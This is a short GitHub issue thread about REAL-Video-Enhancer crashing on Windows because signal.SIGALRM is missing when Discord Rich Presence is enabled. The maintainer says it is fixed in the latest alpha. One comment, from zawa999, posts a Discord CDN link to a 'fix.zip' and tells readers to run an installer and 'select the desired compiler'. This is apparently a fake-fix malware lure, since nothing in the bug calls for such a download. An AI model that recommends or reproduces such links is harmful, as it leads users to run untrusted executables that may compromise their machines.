### ISSUE TITLE
Discord closed with Rich Presence enabled causes traceback error on render

### ISSUE THREAD

**Issue by TheLWD** [TNTwise/REAL-Video-Enhancer#23]
Who closes discord anyway xD - Venn

```
Traceback (most recent call last):
  File "REAL-Video-Enhancer.py", line 329, in startRender
  File "src\ui\ProcessTab.py", line 157, in run
  File "src\DiscordRPC.py", line 34, in start_discordRPC
  File "contextlib.py", line 137, in __enter__
  File "src\DiscordRPC.py", line 18, in time_limit
AttributeError: module 'signal' has no attribute 'SIGALRM'. Did you mean: 'SIGABRT'?

```

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by TNTwise** [comment]
(Should be) Fixed in latest alpha, thanks for reporting!
